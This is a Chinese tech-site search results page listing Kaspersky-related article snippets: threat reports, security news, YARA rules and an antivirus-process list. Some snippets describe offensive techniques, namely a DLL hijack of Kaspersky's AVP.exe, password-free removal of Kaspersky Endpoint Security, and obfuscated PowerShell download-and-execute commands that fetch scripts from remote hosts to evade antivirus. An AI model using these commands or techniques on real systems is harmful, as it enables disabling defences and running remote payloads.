首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏黑白天安全团队

    Kaspersky AVP.exe DLL 劫持

    Kaspersky AVP.exe 中的 DLL 注入允许本地管理员在不知道 Kaspersky 密码的情况下杀死或篡改防病毒软件和在高权限中执行命令。 在Kaspersky AVP.exe进程尝试加载缺少的wow64log.dllDLL文件(在System32)。 版本 卡巴斯基安全软件 AVP.exe版本 Kaspersky Password Manager Service 卡巴斯基安全软件启动的进程为: Kaspersky Password Manager //log("detach"); break; } return TRUE; } 手动复制在目标文件目录中,然后启动卡巴斯基,可以看到加载了我们的Wow64log.dll 启动Kaspersky

    1.3K20编辑于 2022-11-11
  • 来自专栏安智客

    kaspersky:2018金融业网络威胁报告

    1,2017年,钓鱼页面超过1/4尝试攻击金融行业。金融行业占网络钓鱼的份额从47.5%增加到54%。

    61920发布于 2018-07-30
  • 来自专栏HikariLan's Blog

    如何在不知道密码的情况下卸载 Kaspersky Endpoint Security 和 Kaspersky Security Center Network Agent

    由 ChatGPT 生成的文章摘要 作者HikariLan是一位博主,分享了他在卸载Kaspersky Endpoint Security和Kaspersky Security Center Network 通过在注册表中改变一个标志位的值来绕过密码保护,然后使用Kaspersky的卸载工具成功移除Kaspersky Endpoint Security。 如何在不知道密码的情况下卸载 Kaspersky Endpoint Security 和 Kaspersky Security Center Network Agent 前言 你能想象这样的事情吗:在风平浪静的一天 卸载 Kaspersky Endpoint Security 虽然关闭/卸载 Kaspersky Endpoint Security 需要输入管理员账号和密码,但是! 该方案也适用于其他 Kaspersky 的安全产品 卸载 Kaspersky Security Center Network Agent 卸载 Kaspersky Security Center Network

    6.5K10编辑于 2024-07-03
  • 来自专栏betasec

    常见反病毒进程/服务/识别总结

    ccEvtMgr、ccSetMgr 进程名:ccEvtMgr.exe、ccSetMgr.exe、ccsvchst.exe、rtvscan.exe、smc.exe、smcGui.exe、snac.exe (15) Kaspersky 卡巴斯基企业版/服务器版 Kaspersky Endpoint Security、Kaspersky Anti-Virus 8.0企业版 关闭防护:右键托盘图标,恢复保护和控制。 进程名:avp.exe、kavfs.exe(Kaspersky Anti-Virus Service)、klnagent.exe(Kaspersky Administraton Kit Network Agent)、kavtray.exe(Kaspersky Anti-Virus tray app“主进程”)、kavfswp.exe(Kaspersky Anti-Virus worker process

    3.7K10发布于 2020-11-30
  • 来自专栏今天有没有多懂一点工业安全

    2021年4月11日 HW情报快讯

    )声明称 Apkpure 应用商店被恶意模块感染 Kaspersky(卡巴斯基)声明称: APKPure 应用商店已被恶意模块感染,可下载木马程序到安卓设备。 据 Kaspersky 消息,APKPure v3.17.18 版本包含一个内嵌木马的SDK,检测到其为 HEUR:Trojan-Dropper.AndroidOS.Triada.ap 。 Kaspersky 表明,恶意模块的危害程度取决于设备 Android 版本,同时还有智能手机厂商发布以及用户安装安全更新的频率。 截至目前,Kaspersky 方面已经确认:最新版本的 Apkpure v3.17.19 不包含恶意组件,可以安全使用使用。 最后,Kaspersky 提醒用户:永远不要从非官方来源下载应用,并在Android的设置中阻止安装第三方来源的应用;使用可靠的安全解决方案,自动扫描所有新文件;定期更新所有应用和操作系统。

    83220编辑于 2022-05-10
  • 来自专栏AI研习社

    【头条】谷歌发布全新TensorFlow 库tf.Transform;百度将Ring Allreduce算法引入深度学习

    QaSmvdQNbiY4CxBy.html 百度博客(英文):http://research.baidu.com/bringing-hpc-techniques-deep-learning/ 卡巴斯基发布操作系统 Kaspersky 与 Linus、Windows,Mac OS 等优先系统兼容性和通用性的考虑不同,Kaspersky OS 的设计目的有且只有一个:最大化安全。 因此 Kaspersky OS 采用了 Flux 高级安全内核架构(FLASK)。 卡巴斯基不但表示 Kaspersky OS 要做世界上最安全的操作系统,还宣称, Kaspersky OS 的密钥只有量子计算机级别的计算能力才能破解。 值得注意的是,卡巴斯基声称该系统和 Linux 没有任何关系,从头到尾完全自行设计,并因此耗费了巨大人力——公司 CEO Eugene Kaspersky 表示,该系统秘密研制已有 14 年。

    1.6K40发布于 2018-03-29
  • 来自专栏快学Python

    要被抖音笑死了,打开个网页就算黑客?

    /chrome.exe" https://cybermap.kaspersky.com/') 自己测试时,记得将上方代码中换成自己的实际程序路径和具体网址。 selenium import webdriver driver = webdriver.Chrome(your_browser_path) driver.get("https://cybermap.kaspersky.com 如果想在命令行中执行以下命令: python -m webbrowser -t "https://cybermap.kaspersky.com/" 会发现系统的默认浏览器自动启动,并在窗口中打开了https ://cybermap.kaspersky.com/网页。

    1.1K20编辑于 2022-11-28
  • 来自专栏潇湘信安

    powershell上对抗360与火绒的技巧

    oadstring(''http://9821.ink/xxx''))';$a3="$a1,$a2";IEX(-join $a3)" chabug #别名 powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://9821.ink/xxx') 综合起来就成了最开始的上线命令 : powershell set-alias -name kaspersky -value Invoke-Expression;"$a1='kaspersky ((new-object net.webclient ).downl';$a2='oadstring(''http://9821.ink/xxx''))';$a3=$a1,$a2;kaspersky(-join $a3)" 那么看了一些powershell

    2.3K31发布于 2021-07-28
  • 来自专栏公共互联网反网络钓鱼(APCN)

    Kaspersky曝光新型Coinbase钓鱼攻击:伪装Windows专用查看器,实为远程控制木马

    近日,全球知名网络安全公司卡巴斯基(Kaspersky)披露了一起高度定向的网络钓鱼攻击活动,专门针对加密货币交易平台Coinbase的用户。 Kaspersky确认,该程序实为商用或定制化的远程访问工具(RAT),具备屏幕监控、键盘记录、文件窃取和浏览器数据提取等能力。 Kaspersky特别指出,个人投资者和小型交易者风险最高——他们通常缺乏企业级终端防护(如EDR/XDR系统),且习惯在个人电脑上同时处理交易、社交与日常浏览,安全边界模糊。 他结合Kaspersky报告,提出以下具体建议:1. 绝不从邮件或聊天中打开“查看器”“更新包”“安装程序”任何要求你下载并运行本地程序的“官方通知”都极可能是骗局。 正如Kaspersky分析师Olga Altukhova所言:“合法服务永远不会要求你必须在特定操作系统上打开文件。”这句话,值得每一位数字资产持有者铭记。

    30710编辑于 2025-11-11
  • 来自专栏FreeBuf

    I Am The King恶意软件家族分析

    apt_IAmTheKing_KingOfHearts {meta:description = “Matches IAmTheKing’s KingOfHearts C++ implant”author = “Kaspersky Lab”copyright = “Kaspersky Lab”version = “1.0”type = “APT”filetype = “PE”last_modified = “2020-01-20 Lab”copyright = “Kaspersky Lab”version = “1.0”type = “APT”filetype = “PE”last_modified = “2020-01-20 GetLastError→%u” ascii rule apt_IAmTheKing_QueenOfHearts_2020 {meta:author = “Kaspersky”copyright = “ Kaspersky”version = “1.0”type = “APT”filetype = “PE”description = “Find IAmTheKing’s QueenOfHearts 2020

    2.4K60发布于 2020-11-06
  • 来自专栏软件安装

    除了360安全卫士,这些软件也很香

    微软电脑管家官网地址 https://pcmanager.microsoft.com/zh-cn Kaspersky Kaspersky 又名卡巴斯基,主防强悍加上回滚机制,同时有KSN信誉辅以减少软件误报情况 卡巴斯基安装包包含三种版本在内 https://www.kaspersky.com.cn/ 卡巴斯基免费版 卡巴斯基标准版 卡巴斯基优选版 实时反病毒 ✓ ✓ ✓ 在线支付保护 ✕ ✓ ✓ 性能优化

    33010编辑于 2026-03-26
  • 来自专栏Ms08067安全实验室

    红队培训班作业 | 五种免杀bypass火绒360姿势横向测评:哪款更适合你?

    五、无文件落地免杀 (一)在Kali机器上部署恶意powershell脚本 (二)Windows机器远程获取执行 使用命令远程获取脚本执行 powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://192.168.61.103/1

    1.8K40发布于 2021-09-07
  • 来自专栏Ms08067安全实验室

    五种免杀bypass火绒360姿势横向测评:哪款更适合你?

    五、无文件落地免杀 (一)在Kali机器上部署恶意powershell脚本 (二)Windows机器远程获取执行,使用命令远程获取脚本执行 powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://192.168.61.103/1

    4K50编辑于 2022-05-27
  • 来自专栏Khan安全团队

    神兵利器 - EDRHunt

    \EDRHunt.exe scan [EDR] Detected EDR: Windows Defender Detected EDR: Kaspersky Security 扫描全部 $ . \EDRHunt.exe -r 目前可用的 EDR 检测: Windows Defender Kaspersky Security Symantec Security Crowdstrike Security

    60450编辑于 2021-12-09
  • 来自专栏FreeBuf

    美国FCC将卡巴斯基、中国电信和中国移动加入国家安全威胁名单

    参考来源 https://thehackernews.com/2022/03/fcc-adds-kaspersky-and-chinese-telecom.html https://www.reuters.com /business/media-telecom/us-fcc-adds-ao-kaspersky-lab-china-telecom-firms-national-security-threat-list

    36020编辑于 2022-04-12
  • 来自专栏大数据文摘

    【可视化、安全】盘点全球网络攻击实时追踪系统

    来自Arbor networks的由全球270个ISPs匿名分享流量的“数字攻击地图” 穿越:http://www.digitalattackmap.com/ 最像视频游戏的卡巴斯基(Kaspersky 最像视频游戏的卡巴斯基(Kaspersky)的“网络实时地图” 穿越:https://cybermap.kaspersky.com/ Anubis Networks的Cyberfeed带你巡视全球恶意软件感染现状

    4.6K10发布于 2018-05-23
  • 来自专栏reizhi

    卡巴斯基:微软免费杀软不可靠

    近日在卡巴斯基的新品发布时,卡巴斯基首席执行官Eugene Kaspersky对微软免费杀软MSE做了以下评价: “我不信任这个产品,微软提供的安全防护就像一个人在伦敦的地铁里打高尔夫一样,总有些不对 Kaspersky承认自己的安全产品刻意突出了一些功能,以强调与微软这款免费产品的差别。

    57330编辑于 2022-09-26
  • 来自专栏FreeBuf

    Saferwall:下一代开源恶意软件分析平台

    /build/data/license.avastlic中; Kaspersky:将许可证拷贝到. /build/data/kaspersky.license.key中; 运行下列命令,构建并将Ducker Hub推送至所有AV: make multiav-build 运行下列命令创建镜像,并构建一个

    1.5K20发布于 2020-09-04
  • 来自专栏FreeBuf

    世界大战尽在掌控:盘点全球网络攻击实时追踪系统

    来自Arbor networks的由全球270个ISPs匿名分享流量的“数字攻击地图” 穿越:http://www.digitalattackmap.com/ 最像视频游戏的卡巴斯基(Kaspersky 最像视频游戏的卡巴斯基(Kaspersky)的“网络实时地图” 穿越:https://cybermap.kaspersky.com/ Anubis Networks的Cyberfeed带你巡视全球恶意软件感染现状

    3.4K90发布于 2018-02-05
  • 来自专栏企鹅号快讯

    卡巴斯基起诉美国国土安全部,称其下达禁用令前没给申辩机会

    俄罗斯网络安全公司卡巴斯基实验室(Kaspersky Lab)12月18日对美国国土安全部提起诉讼,要求其取消对卡巴斯基杀毒软件的禁令。 12月18日,卡巴斯基的创始人兼首席执行官尤金·卡巴斯基(Eugene Kaspersky)在公开信中称:“美国国土安全部在没有证据的情况下,损害了卡巴斯基的名誉和商业利益。”

    66970发布于 2018-02-09
领券